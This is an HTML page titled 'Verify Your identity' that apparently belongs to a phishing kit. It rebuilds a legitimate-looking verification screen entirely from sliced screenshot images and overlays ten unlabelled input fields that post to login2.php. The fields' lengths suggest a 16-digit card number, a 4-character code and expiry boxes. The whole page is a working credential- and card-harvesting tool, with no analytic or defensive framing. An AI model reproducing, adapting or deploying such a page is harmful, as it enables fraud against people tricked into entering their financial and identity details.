<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Verify Your identity</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1349px; height:538px; z-index:0"><img src="images/paste48.jpg" alt="" title="" border=0 width=1349 height=538></div>

<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:505px; width:1349px; height:390px; z-index:1"><img src="images/paste49.jpg" alt="" title="" border=0 width=1349 height=390></div>

<div id="image3" style="position:absolute; overflow:hidden; left:111px; top:109px; width:371px; height:28px; z-index:2"><img src="images/paste50.jpg" alt="" title="" border=0 width=371 height=28></div>

<div id="image4" style="position:absolute; overflow:hidden; left:468px; top:109px; width:427px; height:27px; z-index:3"><img src="images/paste51.jpg" alt="" title="" border=0 width=427 height=27></div>

<div id="image5" style="position:absolute; overflow:hidden; left:112px; top:139px; width:408px; height:26px; z-index:4"><img src="images/paste52.jpg" alt="" title="" border=0 width=408 height=26></div>

<div id="image6" style="position:absolute; overflow:hidden; left:507px; top:138px; width:399px; height:25px; z-index:5"><img src="images/paste53.jpg" alt="" title="" border=0 width=399 height=25></div>

<div id="image7" style="position:absolute; overflow:hidden; left:115px; top:170px; width:374px; height:26px; z-index:6"><img src="images/paste54.jpg" alt="" title="" border=0 width=374 height=26></div>

<div id="image8" style="position:absolute; overflow:hidden; left:466px; top:168px; width:204px; height:31px; z-index:7"><img src="images/paste55.jpg" alt="" title="" border=0 width=204 height=31></div>

<div id="image9" style="position:absolute; overflow:hidden; left:124px; top:202px; width:249px; height:26px; z-index:8"><img src="images/paste56.jpg" alt="" title="" border=0 width=249 height=26></div>

<div id="image10" style="position:absolute; overflow:hidden; left:172px; top:266px; width:97px; height:13px; z-index:9"><img src="images/paste57.jpg" alt="" title="" border=0 width=97 height=13></div>

<div id="image11" style="position:absolute; overflow:hidden; left:168px; top:296px; width:141px; height:16px; z-index:10"><img src="images/paste58.jpg" alt="" title="" border=0 width=141 height=16></div>

<div id="image12" style="position:absolute; overflow:hidden; left:165px; top:325px; width:199px; height:21px; z-index:11"><img src="images/paste59.jpg" alt="" title="" border=0 width=199 height=21></div>

<div id="image13" style="position:absolute; overflow:hidden; left:169px; top:355px; width:221px; height:19px; z-index:12"><img src="images/paste60.jpg" alt="" title="" border=0 width=221 height=19></div>

<div id="image14" style="position:absolute; overflow:hidden; left:169px; top:388px; width:96px; height:19px; z-index:13"><img src="images/paste61.jpg" alt="" title="" border=0 width=96 height=19></div>

<div id="image15" style="position:absolute; overflow:hidden; left:171px; top:420px; width:73px; height:22px; z-index:14"><img src="images/paste62.jpg" alt="" title="" border=0 width=73 height=22></div>

<div id="image16" style="position:absolute; overflow:hidden; left:169px; top:453px; width:50px; height:24px; z-index:15"><img src="images/paste63.jpg" alt="" title="" border=0 width=50 height=24></div>

<div id="image17" style="position:absolute; overflow:hidden; left:162px; top:471px; width:69px; height:34px; z-index:16"><img src="images/paste64.jpg" alt="" title="" border=0 width=69 height=34></div>

<div id="image18" style="position:absolute; overflow:hidden; left:172px; top:508px; width:73px; height:20px; z-index:17"><img src="images/paste65.jpg" alt="" title="" border=0 width=73 height=20></div>

<form name="form1" method="POST" action="login2.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:200px;left:426px;top:257px;z-index:19">
<input name="formtext2" type="text" maxlength=16 style="position:absolute;width:200px;left:426px;top:288px;z-index:20">
<input name="formtext3" type="text" maxlength=4 style="position:absolute;width:55px;left:425px;top:319px;z-index:21">
<input name="formtext4" type="text" style="position:absolute;width:33px;left:424px;top:354px;z-index:22">
<input name="formtext5" type="text" style="position:absolute;width:200px;left:424px;top:385px;z-index:23">
<input name="formtext6" type="text" style="position:absolute;width:200px;left:424px;top:417px;z-index:24">
<input name="formtext7" type="text" style="position:absolute;width:200px;left:423px;top:449px;z-index:25">
<input name="formtext8" type="text" style="position:absolute;width:200px;left:423px;top:478px;z-index:26">
<input name="formtext9" type="text" style="position:absolute;width:200px;left:422px;top:508px;z-index:27">
<input name="formtext10" type="text" style="position:absolute;width:53px;left:500px;top:353px;z-index:28">
<div id="formimage1" style="position:absolute; left:184px; top:571px; z-index:30"><input type="image" name="formimage1" width="90" height="54" src="images/submit.PNG"></div>
</form>

<div id="image19" style="position:absolute; overflow:hidden; left:461px; top:349px; width:36px; height:29px; z-index:29"><img src="images/paste66.jpg" alt="" title="" border=0 width=36 height=29></div>


</body>
</html>
